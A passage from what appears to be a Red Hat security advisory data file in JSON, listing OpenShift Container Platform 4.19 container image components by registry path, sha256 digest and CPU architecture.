"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
